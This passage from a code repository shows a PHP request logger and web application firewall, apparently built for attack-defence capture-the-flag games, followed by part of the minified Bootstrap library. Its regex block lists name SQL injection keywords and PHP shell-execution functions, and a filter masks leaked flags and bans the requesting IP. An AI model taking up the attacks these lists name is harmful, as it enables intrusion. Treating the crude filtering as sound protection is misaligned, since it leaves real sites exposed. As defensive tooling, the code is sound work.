$realip = '0.0.0.0'; 241 | } 242 | } 243 | } 244 | else 245 | { 246 | if (getenv('HTTP_X_FORWARDED_FOR')) 247 | { 248 | $realip = getenv('HTTP_X_FORWARDED_FOR'); 249 | } 250 | elseif (getenv('HTTP_CLIENT_IP')) 251 | { 252 | $realip = getenv('HTTP_CLIENT_IP'); 253 | } 254 | else 255 | { 256 | $realip = getenv('REMOTE_ADDR'); 257 | } 258 | } 259 | 260 | preg_match("/[\d\.]{7,15}/", $realip, $onlineip); 261 | $realip = !empty($onlineip[0]) ? $onlineip[0] : '0.0.0.0'; 262 | 263 | return $realip; 264 | } 265 | 266 | function basewaf() 267 | { 268 | function addslashes_deep($value) 269 | { 270 | if (empty($value)) 271 | { 272 | return $value; 273 | } 274 | else 275 | { 276 | return is_array($value) ? array_map('addslashes_deep', $value) : addslashes(str_replace('`','',$value)); 277 | } 278 | } 279 | 280 | function compile_str($str) 281 | { 282 | $arr = array('<' => '<', '>' => '>','"'=>'”',"'"=>'’'); 283 | 284 | return strtr($str, $arr); 285 | } 286 | function mysql_like_quote($str) 287 | { 288 | return strtr($str, array("\\\\" => "\\\\\\\\", '_' => '\_', '%' => '\%', "\'" => "\\\\\'")); 289 | } 290 | function addsa_all() 291 | { 292 | if (!get_magic_quotes_gpc()) 293 | { 294 | if (!empty($_GET)) 295 | { 296 | $_GET = addslashes_deep($_GET); 297 | } 298 | if (!empty($_POST)) 299 | { 300 | $_POST = addslashes_deep($_POST); 301 | } 302 | 303 | $_COOKIE = addslashes_deep($_COOKIE); 304 | $_REQUEST = addslashes_deep($_REQUEST); 305 | } 306 | } 307 | function midfilter($string){ 308 | $pattern = "/select|insert|update|delete|and|or|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex"; 309 | 310 | $pattern .= "|file_put_contents|fwrite|curl|system|eval|assert"; 311 | 312 | $pattern .="|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore"; 313 | 314 | $pattern .="|`|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec/is"; 315 | $string = preg_replace($pattern,'', $string); 316 | return $string; 317 | } 318 | function stripevil($string){ 319 | $pattern = '/load_file\(|dumpfile\(|hex\(|substr\(|mid\(|left\(|right\(|ascii\(|group_concat\(|concat\(|substring\(|FIND_IN_SET\(|REPLACE\(|REPEAT\(|REVERSE\(|INSERT\(|SUBSTRING_INDEX\(|TRIM\(|PAD\(|POSITION\(|LOCATE\(|INSTR\(|LENGTH\(|BIN\(|OCT\(|ORD\(|file_put_contents\(|fwrite\(|curl\(|system\(|eval\(|assert\(|file_get_contents\(|passthru\(|exec\(|system\(|chroot\(|scandir\(|chgrp\(|chown\(|shell_exec\(|proc_open\(|proc_get_status\(|popen\(|ini_alter\(|ini_restore\(|dl\(|openlog\(|syslog\(|readlink\(|symlink\(|popepassthru\(|stream_socket_server\(|assert\(|pcntl_exec\(|phpinfo\(|unlink\(|fread\(|mail\(|base64_encode\(|var_dump\(/is'; 320 | $string = preg_replace($pattern,'(',$string); 321 | if(preg_match($pattern, $string)) 322 | $string = stripevil($string); 323 | return $string; 324 | } 325 | function m_filterArray(&$data){ 326 | foreach ($data as $key => $value) { 327 | if( is_array($value) ){ 328 | m_filterArray($data[$key]); 329 | }else{ 330 | if( $key and in_array(strtolower($key), array('goods_id','product_id','cat_id','gid','pid','uid','site_id'))){ 331 | $value and $data[$key] = intval($value); 332 | }elseif ($key and in_array(strtolower($key),array('order_num','advance','advance_freeze','point_freeze','point_history','point','score_rate','state','role_type','advance_total','advance_consume'))) { 333 | unset($data[$key]); 334 | } 335 | 336 | elseif( $value ){ 337 | $data[$key] = midfilter($value); 338 | } 339 | } 340 | } 341 | } 342 | function s_filterArray(&$data){ 343 | foreach ($data as $key => $value) { 344 | if( is_array($value) ){ 345 | s_filterArray($data[$key]); 346 | } 347 | 348 | else{ 349 | $data[$key] = stripevil($value); 350 | 351 | } 352 | } 353 | } 354 | if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) 355 | { 356 | $_SERVER['HTTP_X_FORWARDED_FOR'] = $this->real_ip(); 357 | } 358 | if (isset($_SERVER['HTTP_CLIENT_IP'])) 359 | { 360 | 361 | $_SERVER['HTTP_CLIENT_IP'] = $this->real_ip(); 362 | } 363 | 364 | $_SERVER['HTTP_HOST'] = str_replace('\'','',$_SERVER['HTTP_HOST']); 365 | $_SERVER['HTTP_HOST'] = str_replace('"','',$_SERVER['HTTP_HOST']); 366 | $_SERVER['HTTP_HOST'] = str_replace('`','',$_SERVER['HTTP_HOST']); 367 | $_SERVER['HTTP_HOST'] = str_replace('\\','',$_SERVER['HTTP_HOST']); 368 | $_SERVER['HTTP_HOST'] = str_replace('$','',$_SERVER['HTTP_HOST']); 369 | 370 | 371 | if(PLZ_SET_IS_WAF_START===1){ 372 | $referer=empty($_SERVER['HTTP_REFERER']) ? array() : array($_SERVER['HTTP_REFERER']); 373 | $query_string=empty($_SERVER["QUERY_STRING"]) ? array() : array($_SERVER["QUERY_STRING"]); 374 | s_filterArray($query_string); 375 | s_filterArray($_GET); 376 | s_filterArray($_POST); 377 | s_filterArray($_COOKIE); 378 | s_filterArray($referer); 379 | s_filterArray($_SERVER); 380 | s_filterArray($_REQUEST); 381 | addsa_all(); 382 | } 383 | elseif(PLZ_SET_IS_WAF_START===2){ 384 | $referer=empty($_SERVER['HTTP_REFERER']) ? array() : array($_SERVER['HTTP_REFERER']); 385 | $query_string=empty($_SERVER["QUERY_STRING"]) ? array() : array($_SERVER["QUERY_STRING"]); 386 | s_filterArray($query_string); 387 | s_filterArray($_GET); 388 | s_filterArray($_POST); 389 | s_filterArray($_COOKIE); 390 | s_filterArray($referer); 391 | s_filterArray($_SERVER); 392 | s_filterArray($_REQUEST); 393 | m_filterArray($query_string); 394 | m_filterArray($_GET); 395 | m_filterArray($_POST); 396 | m_filterArray($_COOKIE); 397 | m_filterArray($referer); 398 | m_filterArray($_SERVER); 399 | m_filterArray($_REQUEST); 400 | addsa_all(); 401 | } 402 | elseif(PLZ_SET_IS_WAF_START===3){ 403 | global $danger_sd_be_baned; 404 | if ($danger_sd_be_baned ===1) 405 | die(md5('wupco')); 406 | return 0; 407 | } 408 | else{ 409 | return 0; 410 | } 411 | 412 | return 1; 413 | 414 | 415 | } 416 | 417 | function checkblacklist() 418 | { 419 | switch (BlAck_Or_WhiTe_List){ 420 | case 0: 421 | return 1; 422 | break; 423 | case 1: 424 | 425 | $file = fopen(salt_Logger_bAse_DIR."/hhhhblacklist", "r"); 426 | $ip_list=array(); 427 | $i = 0; 428 | while(! feof($file)) 429 | { 430 | $ip_list[$i]= fgets($file); 431 | $i++; 432 | } 433 | fclose($file); 434 | $ip_list=array_filter($ip_list); 435 | foreach ($ip_list as $ip){ 436 | if(trim($ip) == $this->ip) 437 | return 0; 438 | } 439 | return 1; 440 | break; 441 | case 2: 442 | 443 | $file = fopen(salt_Logger_bAse_DIR."/hhhhwhitelist","r"); 444 | $ip_list=array(); 445 | $i = 0; 446 | while(! feof($file)) 447 | { 448 | $ip_list[$i]= fgets($file); 449 | $i++; 450 | } 451 | fclose($file); 452 | $ip_list=array_filter($ip_list); 453 | foreach ($ip_list as $ip){ 454 | if(trim($ip) == $this->ip) 455 | return 2; 456 | } 457 | 458 | break; 459 | default: 460 | return 1; 461 | break; 462 | 463 | 464 | } 465 | 466 | return 0; 467 | } 468 | 469 | function logger() 470 | { 471 | 472 | $check_b_out = $this->checkblacklist(); 473 | if($check_b_out == 2) 474 | { 475 | return 0; 476 | } 477 | 478 | $logdata = array("url"=>$this->url,"poststr"=>$this->poststr,"getstr"=>$this->getstr,"cookie"=>$this->cookie,"time"=>$this->time,"headers"=>$this->headers,"ip"=>$this->ip,"risk"=>$this->risk,"type"=>$this->type,"file"=>$this->file,"payload"=>$this->headers.$this->poststr.$this->getstr); 479 | $baknum = $this->insert(json_encode($logdata)); 480 | 481 | global $risk_xxx_ttt_id; 482 | $risk_xxx_ttt_id = $baknum; 483 | function del_evil($buffer){ 484 | @exec(GET_FLAG_SHELL,$flag); 485 | if(count($flag)>0) 486 | { 487 | $flag = $flag[0]; 488 | $buffer_1 = str_replace($flag,md5('wupco'),$buffer); 489 | $flag_b64 = base64_encode($flag); 490 | $buffer_2 = str_replace($flag_b64,base64_encode(md5('wupco')),$buffer_1); 491 | if($buffer_2!==$buffer) 492 | { 493 | 494 | global $risk_xxx_ttt_id; 495 | $this_SalT_hhhaaaa_Db_p = new SaLt_Classsssss_LogDatA_HHHHHhhhhh(); 496 | $this_SalT_hhhaaaa_ReT_p = $this_SalT_hhhaaaa_Db_p->upadate_risk($risk_xxx_ttt_id); 497 | file_put_contents(salt_Logger_bAse_DIR."/hhhhblacklist",$_SERVER["REMOTE_ADDR"].PHP_EOL,FILE_APPEND); 498 | 499 | } 500 | return $buffer_2; 501 | 502 | } 503 | else 504 | { 505 | return $buffer; 506 | } 507 | } 508 | if(function_exists('ob_start')){ 509 | ob_start('del_evil'); 510 | } 511 | if($baknum >=0) 512 | $this->get_risk($baknum); 513 | $this->basewaf(); 514 | if($check_b_out == 0) 515 | { 516 | die(md5("emmmmmmm")); 517 | } 518 | return 0; 519 | } 520 | 521 | /*function old_log($id) 522 | { 523 | $sql = 'UPDATE LOGGERS set Time = "'.$this->time.'",headers = "'.$this->headers.'",count = count+1 where ID='.$id.';'; 524 | $this_SalT_hhhaaaa_ReT_p = $this->exec($sql); 525 | $this->get_risk($id); 526 | $this->close(); 527 | return 0; 528 | }*/ 529 | 530 | 531 | } 532 | if (!file_exists(SaLt_This_is_BAse_DiR)) 533 | { 534 | mkdir(SaLt_This_is_BAse_DiR, 0777, true); 535 | $this_SalT_hhhaaaa_Db_p = new SaLt_Classsssss_LogDatA_HHHHHhhhhh(); 536 | if(!$this_SalT_hhhaaaa_Db_p){ 537 | echo $this_SalT_hhhaaaa_Db_p->lastErrorMsg(); 538 | } else { 539 | echo "Opened database successfully\n"; 540 | mkdir(salt_THIs_iS_Web_Dir.LogGer_Web_DiR,0777,ture); 541 | echo "web dir created seccessfully\n"; 542 | file_put_contents(salt_THIs_iS_Web_Dir.LogGer_Web_DiR."/index.html", "afjwodmcswqod",FILE_APPEND); 543 | 544 | $check_content =<<data_root_dir =' 557 | FIR2; 558 | $check_content.=SaLt_This_is_BAse_DiR; 559 | $check_content.=<<path = \$this->data_root_dir.'lock/'; 562 | } 563 | } 564 | exec(' 565 | SEC; 566 | $check_content.=GET_FLAG_SHELL; 567 | $check_content.=<<=0) 590 | { 591 | \$this_SalT_hhhaaaa_Db_p = new SaLt_Classsssss_LogDatA_HHHHHhhhhh(); 592 | \$this_SalT_hhhaaaa_ReT_p = \$this_SalT_hhhaaaa_Db_p->upadate_risk(\$id); 593 | file_put_contents(" 594 | THD; 595 | $check_content.= salt_Logger_bAse_DIR; 596 | $check_content.=<< 611 | INS; 612 | file_put_contents(salt_THIs_iS_Web_Dir.LogGer_Web_DiR."wupco_check.php",$check_content); 613 | file_put_contents(salt_Logger_bAse_DIR."/hhhhblacklist",""); 614 | file_put_contents(salt_Logger_bAse_DIR."/hhhhwhitelist",""); 615 | 616 | $this_SalT_hhhaaaa_ReT_p = $this_SalT_hhhaaaa_Db_p->create(); 617 | if(!$this_SalT_hhhaaaa_ReT_p){ 618 | echo "error"; 619 | } 620 | 621 | else { 622 | echo "Table created successfully\n"; 623 | } 624 | 625 | } 626 | } 627 | else 628 | { 629 | $this_SalT_hhhaaaa_Db_p = new SaLt_Classsssss_LogDatA_HHHHHhhhhh(); 630 | $this_SalT_hhhaaaa_Db_p->logger(); 631 | 632 | } 633 | 634 | ?> 635 | -------------------------------------------------------------------------------- /wupco_static/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wupco/weblogger/aac6160771e8d33fb89f0ae633b6887cf36d312a/wupco_static/.DS_Store -------------------------------------------------------------------------------- /wupco_static/fonts/glyphicons-halflings-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wupco/weblogger/aac6160771e8d33fb89f0ae633b6887cf36d312a/wupco_static/fonts/glyphicons-halflings-regular.eot -------------------------------------------------------------------------------- /wupco_static/fonts/glyphicons-halflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wupco/weblogger/aac6160771e8d33fb89f0ae633b6887cf36d312a/wupco_static/fonts/glyphicons-halflings-regular.ttf -------------------------------------------------------------------------------- /wupco_static/fonts/glyphicons-halflings-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wupco/weblogger/aac6160771e8d33fb89f0ae633b6887cf36d312a/wupco_static/fonts/glyphicons-halflings-regular.woff -------------------------------------------------------------------------------- /wupco_static/fonts/glyphicons-halflings-regular.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wupco/weblogger/aac6160771e8d33fb89f0ae633b6887cf36d312a/wupco_static/fonts/glyphicons-halflings-regular.woff2 -------------------------------------------------------------------------------- /wupco_static/js/bootstrap.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bootstrap v3.3.7 (http://getbootstrap.com) 3 | * Copyright 2011-2016 Twitter, Inc. 4 | * Licensed under the MIT license 5 | */ 6 | if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>3)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.special.bsTransitionEnd={bindType:a.support.transition.end,delegateType:a.support.transition.end,handle:function(b){if(a(b.target).is(this))return b.handleObj.handler.apply(this,arguments)}})})}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var c=a(this),e=c.data("bs.alert");e||c.data("bs.alert",e=new d(this)),"string"==typeof b&&e[b].call(c)})}var c='[data-dismiss="alert"]',d=function(b){a(b).on("click",c,this.close)};d.VERSION="3.3.7",d.TRANSITION_DURATION=150,d.prototype.close=function(b){function c(){g.detach().trigger("closed.bs.alert").remove()}var e=a(this),f=e.attr("data-target");f||(f=e.attr("href"),f=f&&f.replace(/.*(?=#[^\s]*$)/,""));var g=a("#"===f?[]:f);b&&b.preventDefault(),g.length||(g=e.closest(".alert")),g.trigger(b=a.Event("close.bs.alert")),b.isDefaultPrevented()||(g.removeClass("in"),a.support.transition&&g.hasClass("fade")?g.one("bsTransitionEnd",c).emulateTransitionEnd(d.TRANSITION_DURATION):c())};var e=a.fn.alert;a.fn.alert=b,a.fn.alert.Constructor=d,a.fn.alert.noConflict=function(){return a.fn.alert=e,this},a(document).on("click.bs.alert.data-api",c,d.prototype.close)}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.button"),f="object"==typeof b&&b;e||d.data("bs.button",e=new c(this,f)),"toggle"==b?e.toggle():b&&e.setState(b)})}var c=function(b,d){this.$element=a(b),this.options=a.extend({},c.DEFAULTS,d),this.isLoading=!1};c.VERSION="3.3.7",c.DEFAULTS={loadingText:"loading..."},c.prototype.setState=function(b){var c="disabled",d=this.$element,e=d.is("input")?"val":"html",f=d.data();b+="Text",null==f.resetText&&d.data("resetText",d[e]()),setTimeout(a.proxy(function(){d[e](null==f[b]?this.options[b]:f[b]),"loadingText"==b?(this.isLoading=!0,d.addClass(c).attr(c,c).prop(c,!0)):this.isLoading&&(this.isLoading=!1,d.removeClass(c).removeAttr(c).prop(c,!1))},this),0)},c.prototype.toggle=function(){var a=!0,b=this.$element.closest('[data-toggle="buttons"]');if(b.length){var c=this.$element.find("input");"radio"==c.prop("type")?(c.prop("checked")&&(a=!1),b.find(".active").removeClass("active"),this.$element.addClass("active")):"checkbox"==c.prop("type")&&(c.prop("checked")!==this.$element.hasClass("active")&&(a=!1),this.$element.toggleClass("active")),c.prop("checked",this.$element.hasClass("active")),a&&c.trigger("change")}else this.$element.attr("aria-pressed",!this.$element.hasClass("active")),this.$element.toggleClass("active")};var d=a.fn.button;a.fn.button=b,a.fn.button.Constructor=c,a.fn.button.noConflict=function(){return a.fn.button=d,this},a(document).on("click.bs.button.data-api",'[data-toggle^="button"]',function(c){var d=a(c.target).closest(".btn");b.call(d,"toggle"),a(c.target).is('input[type="radio"], input[type="checkbox"]')||(c.preventDefault(),d.is("input,button")?d.trigger("focus"):d.find("input:visible,button:visible").first().trigger("focus"))}).on("focus.bs.button.data-api blur.bs.button.data-api",'[data-toggle^="button"]',function(b){a(b.target).closest(".btn").toggleClass("focus",/^focus(in)?$/.test(b.type))})}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.carousel"),f=a.extend({},c.DEFAULTS,d.data(),"object"==typeof b&&b),g="string"==typeof b?b:f.slide;e||d.data("bs.carousel",e=new c(this,f)),"number"==typeof b?e.to(b):g?e[g]():f.interval&&e.pause().cycle()})}var c=function(b,c){this.$element=a(b),this.$indicators=this.$element.find(".carousel-indicators"),this.options=c,this.paused=null,this.sliding=null,this.interval=null,this.$active=null,this.$items=null,this.options.keyboard&&this.$element.on("keydown.bs.carousel",a.proxy(this.keydown,this)),"hover"==this.options.pause&&!("ontouchstart"in document.documentElement)&&this.$element.on("mouseenter.bs.carousel",a.proxy(this.pause,this)).on("mouseleave.bs.carousel",a.proxy(this.cycle,this))};c.VERSION="3.3.7",c.TRANSITION_DURATION=600,c.DEFAULTS={interval:5e3,pause:"hover",wrap:!0,keyboard:!0},c.prototype.keydown=function(a){if(!/input|textarea/i.test(a.target.tagName)){switch(a.which){case 37:this.prev();break;case 39:this.next();break;default:return}a.preventDefault()}},c.prototype.cycle=function(b){return b||(this.paused=!1),this.interval&&clearInterval(this.interval),this.options.interval&&!this.paused&&(this.interval=setInterval(a.proxy(this.next,this),this.options.interval)),this},c.prototype.getItemIndex=function(a){return this.$items=a.parent().children(".item"),this.$items.index(a||this.$active)},c.prototype.getItemForDirection=function(a,b){var c=this.getItemIndex(b),d="prev"==a&&0===c||"next"==a&&c==this.$items.length-1;if(d&&!this.options.wrap)return b;var e="prev"==a?-1:1,f=(c+e)%this.$items.length;return this.$items.eq(f)},c.prototype.to=function(a){var b=this,c=this.getItemIndex(this.$active=this.$element.find(".item.active"));if(!(a>this.$items.length-1||a<0))return this.sliding?this.$element.one("slid.bs.carousel",function(){b.to(a)}):c==a?this.pause().cycle():this.slide(a>c?"next":"prev",this.$items.eq(a))},c.prototype.pause=function(b){return b||(this.paused=!0),this.$element.find(".next, .prev").length&&a.support.transition&&(this.$element.trigger(a.support.transition.end),this.cycle(!0)),this.interval=clearInterval(this.interval),this},c.prototype.next=function(){if(!this.sliding)return this.slide("next")},c.prototype.prev=function(){if(!this.sliding)return this.slide("prev")},c.prototype.slide=function(b,d){var e=this.$element.find(".item.active"),f=d||this.getItemForDirection(b,e),g=this.interval,h="next"==b?"left":"right",i=this;if(f.hasClass("active"))return this.sliding=!1;var j=f[0],k=a.Event("slide.bs.carousel",{relatedTarget:j,direction:h});if(this.$element.trigger(k),!k.isDefaultPrevented()){if(this.sliding=!0,g&&this.pause(),this.$indicators.length){this.$indicators.find(".active").removeClass("active");var l=a(this.$indicators.children()[this.getItemIndex(f)]);l&&l.addClass("active")}var m=a.Event("slid.bs.carousel",{relatedTarget:j,direction:h});return a.support.transition&&this.$element.hasClass("slide")?(f.addClass(b),f[0].offsetWidth,e.addClass(h),f.addClass(h),e.one("bsTransitionEnd",function(){f.removeClass([b,h].join(" ")).addClass("active"),e.removeClass(["active",h].join(" ")),i.sliding=!1,setTimeout(function(){i.$element.trigger(m)},0)}).emulateTransitionEnd(c.TRANSITION_DURATION)):(e.removeClass("active"),f.addClass("active"),this.sliding=!1,this.$element.trigger(m)),g&&this.cycle(),this}};var d=a.fn.carousel;a.fn.carousel=b,a.fn.carousel.Constructor=c,a.fn.carousel.noConflict=function(){return a.fn.carousel=d,this};var e=function(c){var d,e=a(this),f=a(e.attr("data-target")||(d=e.attr("href"))&&d.replace(/.*(?=#[^\s]+$)/,""));if(f.hasClass("carousel")){var g=a.extend({},f.data(),e.data()),h=e.attr("data-slide-to");h&&(g.interval=!1),b.call(f,g),h&&f.data("bs.carousel").to(h),c.preventDefault()}};a(document).on("click.bs.carousel.data-api","[data-slide]",e).on("click.bs.carousel.data-api","[data-slide-to]",e),a(window).on("load",function(){a('[data-ride="carousel"]').each(function(){var c=a(this);b.call(c,c.data())})})}(jQuery),+function(a){"use strict";function b(b){var c,d=b.attr("data-target")||(c=b.attr("href"))&&c.replace(/.*(?=#[^\s]+$)/,"");return a(d)}function c(b){return this.each(function(){var c=a(this),e=c.data("bs.collapse"),f=a.extend({},d.DEFAULTS,c.data(),"object"==typeof b&&b);!e&&f.toggle&&/show|hide/.test(b)&&(f.toggle=!1),e||c.data("bs.collapse",e=new d(this,f)),"string"==typeof b&&e[b]()})}var d=function(b,c){this.$element=a(b),this.options=a.extend({},d.DEFAULTS,c),this.$trigger=a('[data-toggle="collapse"][href="#'+b.id+'"],[data-toggle="collapse"][data-target="#'+b.id+'"]'),this.transitioning=null,this.options.parent?this.$parent=this.getParent():this.addAriaAndCollapsedClass(this.$element,this.$trigger),this.options.toggle&&this.toggle()};d.VERSION="3.3.7",d.TRANSITION_DURATION=350,d.DEFAULTS={toggle:!0},d.prototype.dimension=function(){var a=this.$element.hasClass("width");return a?"width":"height"},d.prototype.show=function(){if(!this.transitioning&&!this.$element.hasClass("in")){var b,e=this.$parent&&this.$parent.children(".panel").children(".in, .collapsing");if(!(e&&e.length&&(b=e.data("bs.collapse"),b&&b.transitioning))){var f=a.Event("show.bs.collapse");if(this.$element.trigger(f),!f.isDefaultPrevented()){e&&e.length&&(c.call(e,"hide"),b||e.data("bs.collapse",null));var g=this.dimension();this.$element.removeClass("collapse").addClass("collapsing")[g](0).attr("aria-expanded",!0),this.$trigger.removeClass("collapsed").attr("aria-expanded",!0),this.transitioning=1;var h=function(){this.$element.removeClass("collapsing").addClass("collapse in")[g](""),this.transitioning=0,this.$element.trigger("shown.bs.collapse")};if(!a.support.transition)return h.call(this);var i=a.camelCase(["scroll",g].join("-"));this.$element.one("bsTransitionEnd",a.proxy(h,this)).emulateTransitionEnd(d.TRANSITION_DURATION)[g](this.$element[0][i])}}}},d.prototype.hide=function(){if(!this.transitioning&&this.$element.hasClass("in")){var b=a.Event("hide.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.dimension();this.$element[c](this.$element[c]())[0].offsetHeight,this.$element.addClass("collapsing").removeClass("collapse in").attr("aria-expanded",!1),this.$trigger.addClass("collapsed").attr("aria-expanded",!1),this.transitioning=1;var e=function(){this.transitioning=0,this.$element.removeClass("collapsing").addClass("collapse").trigger("hidden.bs.collapse")};return a.support.transition?void this.$element[c](0).one("bsTransitionEnd",a.proxy(e,this)).emulateTransitionEnd(d.TRANSITION_DURATION):e.call(this)}}},d.prototype.toggle=function(){this[this.$element.hasClass("in")?"hide":"show"]()},d.prototype.getParent=function(){return a(this.options.parent).find('[data-toggle="collapse"][data-parent="'+this.options.parent+'"]').each(a.proxy(function(c,d){var e=a(d);this.addAriaAndCollapsedClass(b(e),e)},this)).end()},d.prototype.addAriaAndCollapsedClass=function(a,b){var c=a.hasClass("in");a.attr("aria-expanded",c),b.toggleClass("collapsed",!c).attr("aria-expanded",c)};var e=a.fn.collapse;a.fn.collapse=c,a.fn.collapse.Constructor=d,a.fn.collapse.noConflict=function(){return a.fn.collapse=e,this},a(document).on("click.bs.collapse.data-api",'[data-toggle="collapse"]',function(d){var e=a(this);e.attr("data-target")||d.preventDefault();var f=b(e),g=f.data("bs.collapse"),h=g?"toggle":e.data();c.call(f,h)})}(jQuery),+function(a){"use strict";function b(b){var c=b.attr("data-target");c||(c=b.attr("href"),c=c&&/#[A-Za-z]/.test(c)&&c.replace(/.*(?=#[^\s]*$)/,""));var d=c&&a(c);return d&&d.length?d:b.parent()}function c(c){c&&3===c.which||(a(e).remove(),a(f).each(function(){var d=a(this),e=b(d),f={relatedTarget:this};e.hasClass("open")&&(c&&"click"==c.type&&/input|textarea/i.test(c.target.tagName)&&a.contains(e[0],c.target)||(e.trigger(c=a.Event("hide.bs.dropdown",f)),c.isDefaultPrevented()||(d.attr("aria-expanded","false"),e.removeClass("open").trigger(a.Event("hidden.bs.dropdown",f)))))}))}function d(b){return this.each(function(){var c=a(this),d=c.data("bs.dropdown");d||c.data("bs.dropdown",d=new g(this)),"string"==typeof b&&d[b].call(c)})}var e=".dropdown-backdrop",f='[data-toggle="dropdown"]',g=function(b){a(b).on("click.bs.dropdown",this.toggle)};g.VERSION="3.3.7",g.prototype.toggle=function(d){var e=a(this);if(!e.is(".disabled, :disabled")){var f=b(e),g=f.hasClass("open");if(c(),!g){"ontouchstart"in document.documentElement&&!f.closest(".navbar-nav").length&&a(document.createElement("div")).addClass("dropdown-backdrop").insertAfter(a(this)).on("click",c);var h={relatedTarget:this};if(f.trigger(d=a.Event("show.bs.dropdown",h)),d.isDefaultPrevented())return;e.trigger("focus").attr("aria-expanded","true"),f.toggleClass("open").trigger(a.Event("shown.bs.dropdown",h))}return!1}},g.prototype.keydown=function(c){if(/(38|40|27|32)/.test(c.which)&&!/input|textarea/i.test(c.target.tagName)){var d=a(this);if(c.preventDefault(),c.stopPropagation(),!d.is(".disabled, :disabled")){var e=b(d),g=e.hasClass("open");if(!g&&27!=c.which||g&&27==c.which)return 27==c.which&&e.find(f).trigger("focus"),d.trigger("click");var h=" li:not(.disabled):visible a",i=e.find(".dropdown-menu"+h);if(i.length){var j=i.index(c.target);38==c.which&&j>0&&j--,40==c.which&&jdocument.documentElement.clientHeight;this.$element.css({paddingLeft:!this.bodyIsOverflowing&&a?this.scrollbarWidth:"",paddingRight:this.bodyIsOverflowing&&!a?this.scrollbarWidth:""})},c.prototype.resetAdjustments=function(){this.$element.css({paddingLeft:"",paddingRight:""})},c.prototype.checkScrollbar=function(){var a=window.innerWidth;if(!a){var b=document.documentElement.getBoundingClientRect();a=b.right-Math.abs(b.left)}this.bodyIsOverflowing=document.body.clientWidth
',trigger:"hover focus",title:"",delay:0,html:!1,container:!1,viewport:{selector:"body",padding:0}},c.prototype.init=function(b,c,d){if(this.enabled=!0,this.type=b,this.$element=a(c),this.options=this.getOptions(d),this.$viewport=this.options.viewport&&a(a.isFunction(this.options.viewport)?this.options.viewport.call(this,this.$element):this.options.viewport.selector||this.options.viewport),this.inState={click:!1,hover:!1,focus:!1},this.$element[0]instanceof document.constructor&&!this.options.selector)throw new Error("`selector` option must be specified when initializing "+this.type+" on the window.document object!");for(var e=this.options.trigger.split(" "),f=e.length;f--;){var g=e[f];if("click"==g)this.$element.on("click."+this.type,this.options.selector,a.proxy(this.toggle,this));else if("manual"!=g){var h="hover"==g?"mouseenter":"focusin",i="hover"==g?"mouseleave":"focusout";this.$element.on(h+"."+this.type,this.options.selector,a.proxy(this.enter,this)),this.$element.on(i+"."+this.type,this.options.selector,a.proxy(this.leave,this))}}this.options.selector?this._options=a.extend({},this.options,{trigger:"manual",selector:""}):this.fixTitle()},c.prototype.getDefaults=function(){return c.DEFAULTS},c.prototype.getOptions=function(b){return b=a.extend({},this.getDefaults(),this.$element.data(),b),b.delay&&"number"==typeof b.delay&&(b.delay={show:b.delay,hide:b.delay}),b},c.prototype.getDelegateOptions=function(){var b={},c=this.getDefaults();return this._options&&a.each(this._options,function(a,d){c[a]!=d&&(b[a]=d)}),b},c.prototype.enter=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget).data("bs."+this.type);return c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c)),b instanceof a.Event&&(c.inState["focusin"==b.type?"focus":"hover"]=!0),c.tip().hasClass("in")||"in"==c.hoverState?void(c.hoverState="in"):(clearTimeout(c.timeout),c.hoverState="in",c.options.delay&&c.options.delay.show?void(c.timeout=setTimeout(function(){"in"==c.hoverState&&c.show()},c.options.delay.show)):c.show())},c.prototype.isInStateTrue=function(){for(var a in this.inState)if(this.inState[a])return!0;return!1},c.prototype.leave=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget).data("bs."+this.type);if(c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c)),b instanceof a.Event&&(c.inState["focusout"==b.type?"focus":"hover"]=!1),!c.isInStateTrue())return clearTimeout(c.timeout),c.hoverState="out",c.options.delay&&c.options.delay.hide?void(c.timeout=setTimeout(function(){"out"==c.hoverState&&c.hide()},c.options.delay.hide)):c.hide()},c.prototype.show=function(){var b=a.Event("show.bs."+this.type);if(this.hasContent()&&this.enabled){this.$element.trigger(b);var d=a.contains(this.$element[0].ownerDocument.documentElement,this.$element[0]);if(b.isDefaultPrevented()||!d)return;var e=this,f=this.tip(),g=this.getUID(this.type);this.setContent(),f.attr("id",g),this.$element.attr("aria-describedby",g),this.options.animation&&f.addClass("fade");var h="function"==typeof 